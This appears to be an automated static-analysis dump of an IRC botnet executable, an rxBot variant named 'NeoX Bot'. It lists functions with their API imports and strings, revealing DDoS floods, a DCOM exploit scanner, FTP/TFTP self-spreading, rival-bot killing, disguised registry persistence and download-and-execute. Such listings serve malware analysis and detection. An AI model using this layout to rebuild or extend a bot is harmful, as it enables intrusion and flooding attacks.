_WinMain16(): KERNEL32.GetTickCount KERNEL32.SetErrorMode KERNEL32.CreateMutexA KERNEL32.WaitForSingleObject KERNEL32.ExitProcess WS2_32.WSAStartup WS2_32.WSACleanup KERNEL32.GetWindowsDirectoryA KERNEL32.GetModuleHandleA KERNEL32.GetModuleFileNameA KERNEL32.GetFileAttributesA KERNEL32.SetFileAttributesA KERNEL32.CopyFileA KERNEL32.Sleep KERNEL32.GetCurrentProcessId KERNEL32.OpenProcess KERNEL32.CreateProcessA KERNEL32.CloseHandle KERNEL32.DeleteFileA WININET.InternetGetConnectedState |
sub_outside(): WS2_32.socket WS2_32.ntohs WS2_32.inet_addr WS2_32.connect WS2_32.closesocket KERNEL32.Sleep WS2_32.recv WS2_32.send WS2_32.sendto WS2_32.WSAGetLastError WS2_32.recvfrom KERNEL32.CreateProcessA KERNEL32.GetTickCount KERNEL32.GetComputerNameA KERNEL32.GetLocaleInfoA KERNEL32.GetVersionExA |
sub_409D82(00d3): WS2_32.socket WS2_32.ntohs WS2_32.connect WS2_32.send WS2_32.closesocket WS2_32.recv WS2_32.inet_addr |
sub_418A76(0126): KERNEL32.SetUnhandledExceptionFilter |
sub_40909D(01f3): "-[Alias List]-" "%d. %s = %s" |
sub_40F515(04dc): KERNEL32.GetCurrentProcess ADVAPI32.OpenProcessToken ADVAPI32.LookupPrivilegeValueA KERNEL32.CloseHandle ADVAPI32.AdjustTokenPrivileges |
sub_409C28(051c): WS2_32.closesocket WS2_32.WSACleanup KERNEL32.Sleep KERNEL32.GetWindowsDirectoryA KERNEL32.GetModuleFileNameA KERNEL32.CreateProcessA KERNEL32.CloseHandle KERNEL32.ExitProcess |
sub_40913D(0b55): KERNEL32.GetLocalTime "[%.2d-%.2d-%4d %.2d:%.2d:%.2d] %s" |
sub_410709(0d8b): "USA|XP|SP2|667553" |
sub_4084A5(1170): KERNEL32.SearchPathA KERNEL32.CreateFileA KERNEL32.GetFileTime KERNEL32.CloseHandle KERNEL32.SetFileTime "explorer.exe" |
sub_4081CF(1214): MSVCRT._tolower |
sub_4011CD(12b9): "Nrzi.exe" "FXNBFXFXNBFXFXFXFX" "FXNBFXFXNBFXFXFXFX" |
sub_40F7C9(1a6f): KERNEL32.ExitThread |
sub_40288F(1c50): WS2_32.send "GET / HTTP/1.0\r\nHost: %s\r\nAuthorization"... |
sub_404F31(1c7f): KERNEL32.GetModuleFileNameA KERNEL32.CreateThread KERNEL32.Sleep "Nrzi.exe" "[TFTPD]: Server started on IP: %s:%d, F"... "[TFTPD]: Failed to start server, error:"... "Nrzi.exe" "[FTP]: Server started on Port: %d, File"... "[FTP]: Failed to start server, error: <"... |
sub_403C1E(2466): WS2_32.WSAStartup WS2_32.socket WS2_32.setsockopt WS2_32.ioctlsocket WS2_32.htons WS2_32.bind WS2_32.listen WS2_32.select WS2_32.__WSAFDIsSet WS2_32.accept WS2_32.send WS2_32.recv WS2_32.closesocket "220 StnyFtpd 0wns j0\n" "%s %s" "USER" "331 Password required\n" "PASS" "230 User logged in.\n" "SYST" "215 StnyFtpd\n" "REST" "350 Restarting.\n" "257 \"/\" is current directory.\n" "TYPE" "A" "200 Type set to A.\n" "TYPE" "I" "200 Type set to I.\n" "PASV" "425 Passive not supported on this serve"... "LIST" "226 Transfer complete\n" "PORT" "%*s %[^,],%[^,],%[^,],%[^,],%[^,],%[^\n]"... "%x%x\n" "%s.%s.%s.%s" "200 PORT command successful.\n" "RETR" "150 Opening BINARY mode data connection"... "226 Transfer complete.\n" "FTP File transfer complete: %s" "425 Can't open data connection.\n" "QUIT" "221 Goodbye happy r00ting.\n" |
sub_405A2E(2967): WS2_32.inet_addr KERNEL32.InitializeCriticalSectionAndSpinCount KERNEL32.CreateThread KERNEL32.Sleep WS2_32.inet_ntoa KERNEL32.ExitThread "[SCAN]: Failed to initialize critical s"... "[SCAN]: %s:%d, Scan thread: %d, Sub-thr"... "[SCAN]: Failed to start worker thread, "... "[SCAN]: Finished at %s:%d after %d minu"... |
sub_4023E3(2f6f): WS2_32.ntohl WS2_32.send |
sub_404498(37cf): WS2_32.WSAStartup WS2_32.socket WS2_32.inet_addr WS2_32.htons WS2_32.connect WS2_32.closesocket WS2_32.WSACleanup |
sub_40F9B6(3f26): KERNEL32.GetTickCount |
sub_4102E2(43d4): KERNEL32.ExitThread |
sub_405254(4a11): WS2_32.ntohl |
sub_40F94E(4f03): KERNEL32.GetTickCount "[BoT]-" "%s" "%s%i" |
sub_404515(529a): KERNEL32.GetModuleFileNameA WS2_32.send WS2_32.closesocket WS2_32.WSACleanup "rb" |
sub_40F5A7(54b1): KERNEL32.CreateToolhelp32Snapshot KERNEL32.Process32First KERNEL32.Process32Next KERNEL32.Module32First KERNEL32.CloseHandle KERNEL32.OpenProcess KERNEL32.TerminateProcess "SeDebugPrivilege" " %s (%d)" " %s (%d)" " %s (%d)" "SeDebugPrivilege" |
sub_406B0C(5779): WS2_32.socket WS2_32.closesocket WS2_32.setsockopt WS2_32.WSAGetLastError WS2_32.inet_addr WS2_32.htons KERNEL32.GetTickCount WS2_32.getsockname WS2_32.sendto "You cant send packets for 0 seconds." "[DDOS] Error calling socket()." "[DDOS] Error calling setsockopt(). fWSA"... "[DDOS] :Invalid target IP." "[DDOS] :Sending packets to %s..." "%d.%d.%d.%d" "[DDOS] :Error sending packets to %s. ea"... "[DDOS] :Finished sending packets to %s."... |
sub_408A81(5e19): KERNEL32.GetTickCount "%dd %dh %dm" |
sub_401000(68f8): KERNEL32.MultiByteToWideChar "\\IPC$" "\\\\" |
sub_408B0C(6a2c): KERNEL32.Sleep |
sub_405759(6d78): KERNEL32.GetTickCount WS2_32.inet_ntoa KERNEL32.Sleep KERNEL32.ExitThread "[SCAN]: IP: %s:%d, Scan thread: %d, Sub"... "[SCAN]: IP: %s, Port %d is open." "dcom135" |
sub_4103E7(70a7): KERNEL32.TerminateThread WS2_32.closesocket "USA|XP|SP2|667553" |
StartAddress(7701): WS2_32.socket KERNEL32.Sleep WS2_32.WSAGetLastError KERNEL32.ExitThread WS2_32.ntohs WS2_32.bind WS2_32.select WS2_32.recvfrom WS2_32.inet_ntoa WS2_32.sendto WS2_32.closesocket "octet" "-TFTPD- Error: socket() failed, returne"... "rb" "-TFTPD- Failed to open file: %s." "-TFTPD- File not found: %s (%s)." "TFTP File transfer complete: %s" |
sub_40ABFE(7b52): KERNEL32.ExitProcess KERNEL32.CreateThread KERNEL32.Sleep WS2_32.closesocket WS2_32.WSACleanup KERNEL32.GetTickCount WS2_32.getsockname WS2_32.inet_ntoa KERNEL32.DeleteFileA KERNEL32.GetTempPathA " :" " " " " "!" "PING" "PONG %s\r\n" "JOIN %s %s\r\n" "001" "005" "USERHOST %s\r\n" "+iup-x" "MODE %s %s\r\n" "JOIN %s %s\r\n" "302" "@" "433" "NICK %s\r\n" "KICK" "NOTICE %s :%s\r\n" "JOIN %s %s\r\n" "NICK" ":%s%s" "PART" "QUIT" "PART" "NOTICE %s :%s\r\n" "353" "PRIVMSG" "NOTICE" "332" "PRIVMSG" "NOTICE" "NOTICE" "#" "%s has just versioned me." "#!nhg!#" "login" "!" "~" "nhg" "NOTICE %s :Nice try, idiot. (%s!%s).\r\n" "NOTICE %s :You've been logged.\r\n" "NOTICE %s :Nice try, idiot. (%s!%s).\r\n" "NOTICE %s :You've been logged.\r\n" "nhg" "332" " :" "$%d-" "$%d" "$me" "$user" "$chan" "$rndnick" "$server" "$chr(" "$chr(" ")" "63" " " " " "irc.rndnick" "rn" "NICK %s\r\n" "irc.die" "irc.di" "332" "irc.logout" "lo" "irc.version" "ver" "NeoX Bot Nzm M0dded on Rx v3.2" "log.off" "Log list" "ddos.off" "DDoS flood" "ddos.udp.off" "UDP flood" "daemon.tftp.off" "Server" "com.ps.off" "Process list" "bk.off" "Botkiller" "BOTKILLER" "Secure" "scanstop" "Scan" "[SCAN]" "stats" "st" "irc.r" "QUIT :reconnecting\r\n" "irc.disconnect" "irc.d" "QUIT :disconnecting\r\n" "irc.quit" "irc.q" "QUIT :%s\r\n" "QUIT :later\r\n" "irc.status" "irc.s" "irc.id" "irc.i" "NeoX" "com.rebewt" "threads.list" "threads.l" "sub" "irc.aliases" "irc.al" "irc.log" "irc.lg" "%s" "util.clg" "com.netinfo" "com.ni" "com.sysinfo" "com.si" "fakju" "com.procs" "com.ps" ".n.z.m. (processes.p.l.g) .. Already"... "full" ".n.z.m. (processes.p.l.g) .. Procces"... ".n.z.m. (processes.p.l.g) .. Failed "... "bk.on" "botkiller.on" "bk.on.a" "botkiller.on.a" ".n.z.m. (botkiller.p.l.g) .. Already"... "bk.on.a" "botkiller.on.a" ".n.z.m. (botkiller.p.l.g) .. Botkill"... ".n.z.m. (botkiller.p.l.g) .. Failed "... "com.uptime" "com.up" "irc.who" "-[Login List]-" "%d. %s" "currentip" "cip" "mass" ".n.z.m. (root.p.l.g) .. Already %d s"... "dcom135" "dcom135" ".n.z.m. (root.p.l.g) .. Failed to st"... "#!exp!#" "#!exp!#" "Random" "Sequential" ".n.z.m. (root.p.l.g) .. %s Port Scan"... ".n.z.m. (root.p.l.g) .. Failed to st"... "irc.nick" "irc.n" "NICK %s\r\n" "irc.join" "irc.j" "JOIN %s %s\r\n" "irc.part" "irc.pt" "PART %s\r\n" "irc.raw" "irc.ra" "%s\r\n" "threads.kill" "threads.k" "all" "irc.setserve" "irc.se" "com.killprocname" "com.kpn" "com.prockillid" "com.pkid" "com.delete" "com.del" "mirc.cmd" "mirc.cmd" "irc.gethost" "irc.gh" "%s %s %s :%s" "irc.privmsg" "irc.pm" "irc.action" "irc.ac" "irc.cycle" "irc.cy" "332" "PART %s\r\n" "JOIN %s %s\r\n" "irc.mode" "irc.m" "MODE %s\r\n" "up" "NeoX" "%s%s.exe" "ddos.syn" "ddos.ack" "[DDOS]: Failed to start ddos thread, er"... "ddos.udp" "[DDOS]: Failed to start ddos thread, er"... "dwl" "advscan" "[SCAN]: Already %d scanning threads. To"... "dcom135" "[SCAN]: Failed to start scan, port is i"... "[SCAN]: Failed to start scan, no IP spe"... "#!exp!#" "#!exp!#" "Random" "Sequential" "[SCAN]: %s Port Scan started on %s:%d w"... "[SCAN]: Failed to start scan thread, er"... |
sub_40110C(7fb4): KERNEL32.MultiByteToWideChar KERNEL32.Sleep "\\IPC$" "\\\\" |
sub_40840B(8272): USER32.FindWindowA KERNEL32.CreateFileMappingA KERNEL32.MapViewOfFile USER32.SendMessageA KERNEL32.UnmapViewOfFile KERNEL32.CloseHandle "mIRC" "mIRC" |
sub_401EC3(8f93): "BBBB" "CCCC" |
sub_410340(9427): "-[Thread List]-" "%d. %s" |
sub_408EF7(9797): WININET.InternetGetConnectedStateExA "Not connected" "Dial-up" "LAN" "[NETINFO]: [Type]: %s (%s). [IP Address"... |
sub_403564(97b4): WS2_32.send |
sub_404EAD(97d2): WS2_32.inet_ntoa "[SCAN]: Current IP: %s." "[SCAN]: Scan not active." |
sub_40A08D(9ca4): WS2_32.send KERNEL32.Sleep "NOTICE" "PRIVMSG" "%s" "%s %s :%s\r\n" |
sub_40954C(9ed1): ADVAPI32.RegCreateKeyExA ADVAPI32.RegSetValueExA ADVAPI32.RegDeleteValueA ADVAPI32.RegCloseKey "Microsoft Security Update Process" "Microsoft Security Update Process" |
sub_40834A(9f79): KERNEL32.FormatMessageA "%s Error: %s <%d>." |
sub_4095D3(9f79): WININET.InternetOpenUrlA KERNEL32.CreateFileA KERNEL32.ExitThread KERNEL32.GetTickCount WININET.InternetReadFile KERNEL32.WriteFile KERNEL32.CloseHandle SHELL32.ShellExecuteA KERNEL32.CreateProcessA WS2_32.WSACleanup KERNEL32.ExitProcess WININET.InternetCloseHandle "open" |
sub_4088D0(a2e2): WS2_32.inet_addr WS2_32.gethostbyname |
sub_40FD9A(a42b): "const" |
sub_40A776(ac6f): WS2_32.ntohs WS2_32.socket WS2_32.connect WS2_32.closesocket KERNEL32.Sleep KERNEL32.CreateThread "USA|XP|SP2|667553" ".n.z.m. (botkiller.p.l.g) .. Botkill"... |
sub_405CF2(b7b0): KERNEL32.FindFirstFileA KERNEL32.FindClose "%s\\%s" |
sub_407087(bbc3): KERNEL32.GetModuleHandleA KERNEL32.GetProcAddress KERNEL32.LoadLibraryA WININET.InternetOpenA "kernel32.dll" "SetErrorMode" "CreateToolhelp32Snapshot" "Process32First" "GetDiskFreeSpaceExA" "GetLogicalDriveStringsA" "SearchPathA" "QueryPerformanceCounter" "QueryPerformanceFrequency" "RegisterServiceProcess" "user32.dll" "SendMessageA" "FindWindowA" "IsWindow" "GetClipboardData" "CloseClipboard" "advapi32.dll" "RegCreateKeyExA" "RegSetValueExA" "RegQueryValueExA" "RegDeleteValueA" "RegCloseKey" "OpenProcessToken" "LookupPrivilegeValueA" "AdjustTokenPrivileges" "GetUserNameA" "gdi32.dll" "CreateDCA" "CreateDIBSection" "CreateCompatibleDC" "GetDIBColorTable" "SelectObject" "BitBlt" "DeleteDC" "DeleteObject" "ws2_32.dll" "WSAStartup" "WSASocketA" "WSAAsyncSelect" "__WSAFDIsSet" "WSAIoctl" "WSAGetLastError" "WSACleanup" "socket" "ioctlsocket" "connect" "inet_ntoa" "inet_addr" "htons" "htonl" "ntohs" "ntohl" "send" "sendto" "recv" "recvfrom" "bind" "select" "listen" "accept" "setsockopt" "getsockname" "gethostname" "getpeername" "closesocket" "wininet.dll" "InternetGetConnectedState" "InternetGetConnectedStateEx" "HttpOpenRequestA" "HttpSendRequestA" "InternetConnectA" "InternetOpenUrlA" "InternetCrackUrlA" "InternetReadFile" "InternetCloseHandle" "Mozilla/4.0 (compatible)" "netapi32.dll" "NetShareAdd" "NetShareDel" "NetShareEnum" "NetScheduleJobAdd" "NetApiBufferFree" "NetRemoteTOD" "NetUserAdd" "NetUserDel" "NetUserEnum" "NetUserGetInfo" "NetMessageBufferSend" "dnsapi.dll" "DnsFlushResolverCache" "DnsFlushResolverCacheEntry_A" "iphlpapi.dll" "DeleteIpNetEntry" "mpr.dll" "WNetAddConnection2A" "WNetAddConnection2W" "WNetCancelConnection2A" "WNetCancelConnection2W" "shell32.dll" "SHChangeNotify" "odbc32.dll" "SQLDriverConnect" "SQLAllocHandle" |
sub_40A03C(bcf9): WS2_32.send |
sub_405369(c1ed): WS2_32.socket WS2_32.ntohs WS2_32.ioctlsocket WS2_32.connect WS2_32.select WS2_32.closesocket |
sub_4016C0(ccb8): KERNEL32.CreateFileA KERNEL32.CloseHandle KERNEL32.TransactNamedPipe KERNEL32.WriteFile KERNEL32.ReadFile WS2_32.socket WS2_32.ntohs WS2_32.inet_addr WS2_32.closesocket WS2_32.connect WS2_32.send WS2_32.recv KERNEL32.Sleep |
sub_408651(cd0f): KERNEL32.GetTempPathA KERNEL32.CreateFileA KERNEL32.WriteFile KERNEL32.CloseHandle KERNEL32.GetModuleHandleA KERNEL32.GetModuleFileNameA KERNEL32.GetFileAttributesA KERNEL32.SetFileAttributesA KERNEL32.ExpandEnvironmentStringsA KERNEL32.CreateProcessA "%sdel.bat" "@echo off\r\n:repeat\r\ndel \"%%1\"\r\nif exist"... "%%comspec%% /c %s %s" |
sub_4093A7(d100): KERNEL32.ExitThread |
sub_410231(d22b): "USA|XP|SP2|667553" |
sub_408626(d47a): USER32.ExitWindowsEx "SeShutdownPrivilege" |
sub_408910(d685): DNSAPI.DnsFlushResolverCache |
sub_40F8C5(d73a): KERNEL32.OpenProcess KERNEL32.TerminateProcess KERNEL32.CloseHandle |
sub_418A65(d8fa): KERNEL32.SetUnhandledExceptionFilter |
sub_4052B5(da30): "%d.%d.%d.%d" |
sub_40634F(dc26): KERNEL32.GetTickCount WS2_32.WSAStartup WS2_32.WSACleanup WS2_32.socket WS2_32.closesocket WS2_32.setsockopt WS2_32.WSAGetLastError WS2_32.inet_addr WS2_32.htons WS2_32.getsockname WS2_32.htonl KERNEL32.lstrcmpA WS2_32.sendto "You cant send packets for 0 seconds." "[DDOS] Error WSAData." "[DDOS] Error calling socket()." "[DDOS] Error calling setsockopt(). fWSA"... "[DDOS] :Invalid target IP." "[DDOS] :Sending packets to %s..." "%d.%d.%d.%d" "ddos.syn" "ddos.ack" "ddos.random" "[DDOS] :Error sending packets to %s. ea"... "[DDOS] :Finished sending packets to %s."... |
sub_41B009(e3a0): "invalid string position" |
sub_4025FE(e6af): WS2_32.send "" |
sub_40892F(e6cf): WS2_32.getsockname "%d.%d.%d.%d" |
sub_410663(e8bb): "%s: %s stopped. (%d thread(s) stopped.)"... "%s: No %s thread found." |
sub_40FE3E(eb15): " get " |
sub_40227D(ed62): WS2_32.select WS2_32.__WSAFDIsSet WS2_32.recv |
sub_404D97(f0a5): "[SCAN]: Exploit Statistics:" "Dcom135" " %s: %d," " Total: %d" |
sub_405D52(f4c4): KERNEL32.GetSystemDirectoryA KERNEL32.GetWindowsDirectoryA KERNEL32.Sleep KERNEL32.CreateToolhelp32Snapshot KERNEL32.Process32First KERNEL32.Process32Next KERNEL32.lstrcmpiA KERNEL32.OpenProcess KERNEL32.TerminateProcess KERNEL32.CloseHandle KERNEL32.SetFileAttributesA KERNEL32.DeleteFileA KERNEL32.ExitThread "SeDebugPrivilege" "Nrzi.exe" "Error terminating: %s (pid: %d)!" "#!exp!#" "%s\\%s" "Bot killed and removed: %s (pid: %d)!" "Can not delete: %s (pid: %d)!" "#!exp!#" "Error terminating: %s (pid: %d)!" "#!exp!#" "%s\\%s" "Bot killed and removed: %s (pid: %d)!" "Can not delete: %s (pid: %d)!" "#!exp!#" "SeDebugPrivilege" |
sub_408C2B(f9f0): KERNEL32.GetVersionExA ADVAPI32.GetUserNameA WS2_32.inet_addr WS2_32.gethostbyaddr KERNEL32.GetSystemDirectoryA KERNEL32.GetDateFormatA KERNEL32.GetTimeFormatA KERNEL32.GlobalMemoryStatus "95" "NT" "98" "ME" "2K" "XP" "2003" "???" "%s (%s)" "couldn't resolve host" "dd:MMM:yyyy" "HH:mm:ss" "[SYSINFO]: [CPU]: %I64uMHz. [OS]: Windo"... |
sub_40A9EB(fd7f): WS2_32.send WS2_32.closesocket KERNEL32.Sleep WS2_32.recv "PASS %s\r\n" |
sub_408200(ff96): MSVCRT._tolower |